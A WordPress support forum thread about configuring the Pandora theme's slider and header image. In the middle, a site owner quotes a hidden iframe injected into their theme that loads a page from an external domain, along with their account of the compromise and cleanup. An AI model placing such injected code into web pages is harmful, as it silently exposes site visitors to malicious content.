[Theme: pandora] How to Change Motto Image header
I cannot even change the “Welcome you! :::: This is the Pandora theme by belicza.com. Pandora has many extended options in Pandora menu of the Dashboard. You should set a style. It’s so easy :)”
I’ve posted right dimension (1000×300), But those words still appear.
how to change?
You have to choose a post category from the theme settings (Pandora Settings). And than slider’s images appears from that posts of category.
This doesnt work. Please advise again on how to change the welcome message from the main slider image.
I tested some minutes ago again. It works.
The last public version (1.3.2) is stable.
Set Pandora Slider via Dashboard step by step:
- Make a Category on Posts -> Categories
- Public a post via Posts -> New Post
- Add a Featured Image to this post (minimum width have to be 1000 pixels) than write something and click to Save
- Open the Pandora Options from Appearance
- Select your Category from Post Category for Slider field. Off course your previous Post should be in this selected Category.
- Click to Save
- Now, the customized Slider works in Pandora Theme.
I found how to do it by directly editing the Main.php slider application located in a submenu of the pandora theme folder. This is the only way it seems..
That is the hard way. I developed Pandora Options to users for can do this without coding. But if you want to edit it is a good thing.
Thanks David.. I still wanted to use the original image without having to post anything. But I will save your instruction for future reference.
By the way David.. I had to re-install the theme because someone hacked into my hostgator server (reseller/ and infected one of the theme files with this code:
<IFRAME style=”POSITION: absolute; VISIBILITY: hidden; TOP: 0px; LEFT: 0px” height=10 src=”https://pfugkrt.sixth.biz/d/404.php?go=1″ width=10></IFRAME>
I try to find the culprit routine to no avail so I ended up deleting the theme and re-installing it. That got rid of the code which was coming every time I loaded the site and earn me a Google tag of dangerous site. I changed my server password and re-generated the WP keys. I also deleted all the comments I had from users. Can you shed some light on this. How this happened? How I can avoid it to happen again? And if it does happen again, how I get rid of it without having to re-install. Thanks in advanced for any help you could provide me with so I won’t have to go through this nightmare again.
I think the WordPress and www.remarpro.com’s themes are not “hackable” by comments.
Maybe you have an insecure Plugin or any Plugin with input fields what allow the code injections.
Was that code in output HTML or source HTML? If it was in the source your web storage is infected (Database or any file).
Any sites what are contains IFRAME and that IFRAME call JavaScript from external server are insecure and Google Chrome turn off it in their browser.
Don’t use too many Plugins, always update the WordPress and make backups.
It was in the source. Injected in the very first line of the page before the w3 tag. I checked the index files and the code was not there. It seems that it was being placed by the routine that constructs the actual viewable page. I thought about the piece of code being stored in a table of one of the databases but I couldnt find it doing searches on the databases so it probably was getting injected by a routine call within the index file or any other file called by the index. I am a trained programmer but I have never coded in php so I couldnt really trace the call. The fact is that I tried everything from updating WP to disabling, erasing and re-=installing the plugins and I couldnt stop it from loading. As soon as I deactivated, erased and re-installed the pandora theme I was able to stop it. That is why I am assuming that the malware piece of code was somehow embedded in one of the pandora’s routines. How this happened, I dont really know. Like I said I host my sites in Hostgator as a re-seller with my own server. I host several sites in this server and I use WP in every single one of them, including a test site with networked WP on it, and this was the only site affected, the one with the pandora theme. My plugins in the pandora site are few, Askimet, Hello Dolly which was inactive, the WP import plugging and at one point a while ago I tried several sliders plugins to try to have sliders as widgets on my site but at the end I desisted and ended up deleting those plugs out. This was back in January. Whomever invaded my site did it sometime in May, I believe. The site was working fine up to this week. This is a site that has quite a following and although I have gotten emails from some visitors about being blocked, when I would check I was not seeing anything until this time when I got warned by google, so I discarded the previous complains as the user’s own firewalls advising about the content and nothing serious (this site has sex-related discussions). I dont know if these previous complains were early warnings of a site being invaded but again, this week was when for the first time I experienced the google warning myself.
I’ve read the above and thought I took it step by step but I still have the default header on the opening page https://www.flight18.net with the two images and text
als the pink writing with the bad font for my title
how can I remove and leave just the logo
or this Slider! with six scrolling images?Please help!
Thanks so much
Captain Wally Bruce
Hi David
I have set Pandora Slider via Dashboard to follow your step by step method and its working fine. Thanks a lot. Now I want to know one more things, does the slideshow on Pandora work on Pages too or just Posts? I’m looking for same slideshow will work on Pages also.
I love this theme but I want to completely turn off the slider. How do I do this?? I do not like the slider at all but I love the rest of the theme. Thanks!
HI David, I tried 5 times to set my images via Dashboard, following yours step-by-step guide.
1 – I created a new Categories called “Pandora Silder”
2 – I set the Post Category for Slider –> Pandora Slider
3 – I created a new Post inside the Categores “Pandora Slider”, I added an image from my libraries and i wrote a simple text.I see my new post on index page but the header image is always yours default image.
What’s wrong ?
You’re supposed to create your own thread for support with your own issue.
OK, no problem! I’ll do.
But the problem is the same of this thread…
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